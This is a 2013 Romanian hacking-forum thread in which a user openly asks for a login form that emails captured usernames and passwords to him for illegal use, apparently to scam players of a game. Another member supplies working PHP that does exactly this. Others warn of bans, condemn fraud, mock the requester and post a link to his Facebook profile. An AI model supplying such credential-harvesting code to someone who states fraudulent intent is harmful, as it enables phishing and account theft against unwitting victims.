DeCrew Posted September 24, 2013 Report Posted September 24, 2013 (edited) Vreau ajutor pentru ca vreau sa creez un form simplu ex: username ,password and drop down meniu cu submission la mail-ul meu pe un webhost free(detin asa ceva)Un tutorial dau rep +thx la care ma ajuta pentru ca cele online imi da batai de cap ma baneazasi vreau sa le folosesc pentru ilegalitatii. email submission= adica cand da submit la date le trimite automat la mail-ul meu Edited September 24, 2013 by DeCrew
Silviu Posted September 24, 2013 Report Posted September 24, 2013 O sa iti iei mare ban de iti tiuie in 5,4,3,2..
DeCrew Posted September 24, 2013 Author Report Posted September 24, 2013 O sa iti iei mare ban de iti tiuie in 5,4,3,2..nu prea cred , e un forum de hacking so give me 5
Sim Master Posted September 24, 2013 Report Posted September 24, 2013 Asa ceva?<?phpif ($_SERVER['REQUEST_METHOD'] == 'POST'){ $to = 'mail-ul tau'; $subj = 'Subiect email'; $msg = 'User: '.$_POST['user'].'Pass: '.$_POST['pass'].'Optiunea aleasa: '.$_POST['something']; mail($to, $subj, $msg);}?><form method="post"> Username: <input type="text" name="user"><br> Password: <input type="password" name="pass"><br> Dropdown?: <select name="something"> <option value="a">Prima optiune</option> <option value="b">A doua optiune</option> <option value="c">A treia optiune</option> </select><br> <input type="submit" value="Send"></form>
sebywarlord Posted September 24, 2013 Report Posted September 24, 2013 (edited) @DeCrew E un forum de hacking ,nu de cardingNu spun neaparat ca vrei sa faci carding,dar daca vrei,fa pe alte forumuri nu pe RST!LE: nu te-am acuzat de nimic,doar ti-am spus la ce se refera silvian0 cu "ban" Edited September 24, 2013 by sebywarlord
DeCrew Posted September 24, 2013 Author Report Posted September 24, 2013 Asa ceva?<?phpif ($_SERVER['REQUEST_METHOD'] == 'POST'){ $to = 'mail-ul tau'; $subj = 'Subiect email'; $msg = 'User: '.$_POST['user'].'Pass: '.$_POST['pass'].'Optiunea aleasa: '.$_POST['something']; mail($to, $subj, $msg);}?><form method="post"> Username: <input type="text" name="user"><br> Password: <input type="password" name="pass"><br> Dropdown?: <select name="something"> <option value="a">Prima optiune</option> <option value="b">A doua optiune</option> <option value="c">A treia optiune</option> </select><br> <input type="submit" value="Send"></form>da asa ceva dar sa mearga sa-mi trimita submited data la email-ul meu
DeCrew Posted September 24, 2013 Author Report Posted September 24, 2013 @DeCrew E un forum de hacking ,nu de cardingNu spun neaparat ca vrei sa faci carding,dar daca vrei,fa pe alte forumuri nu pe RST!lol eu niciodata n-am zis de asa ceva doar pentru un joc stupid, ratat, scammed kids... nu prea
Sim Master Posted September 24, 2013 Report Posted September 24, 2013 L-ai testat macar? Adauga mailul tau la $to = 'mail-ul tau'; si pune-l pe host. Atata timp cat hostul te lasa sa trimiti mailuri, o sa mearga.
DeCrew Posted September 24, 2013 Author Report Posted September 24, 2013 L-ai testat macar? Adauga mailul tau la $to = 'mail-ul tau'; si pune-l pe host. Atata timp cat hostul te lasa sa trimiti mailuri, o sa mearga.ce pun la Pass: '.$_POST['pass'].' ?scuze dar nu prea ma pricep la coding ...
wildchild Posted September 24, 2013 Report Posted September 24, 2013 (edited) Vreau ajutor pentru ca vreau sa creez un form simplu ex: username ,password and drop down meniu cu submission la mail-ul meu pe un webhost free(detin asa ceva)Un tutorial dau rep +thx la care ma ajuta pentru ca cele online imi da batai de cap ma baneazasi vreau sa le folosesc pentru ilegalitatii. email submission= adica cand da submit la date le trimite automat la mail-ul meuO fi forum de hacking, dar aici n-au ce caut? fraudele ?i ac?iunile ilegale. JET!https://www.facebook.com/EratostentialProfilul mafiotului. Edited September 24, 2013 by wildchild
yo20063 Posted September 24, 2013 Report Posted September 24, 2013 I simply die when i see this...pardon my english.....man, if you wanna do a scam learn something first! (before you go to jail and you don't even know what for).I mean you ask something, people hands you that, and you even don't know as much as to modify a variable, function, whatever.Listen to me....even if you know a lot about programming, protecting yourself, trick technology, is hard do be in that area were you would actually scam someone for money. But you? You are trying to do something without knowing witch "fork" to use...you gonna get caught!Go to tutorials, spend a year, and if you still feal that you want to this...do it!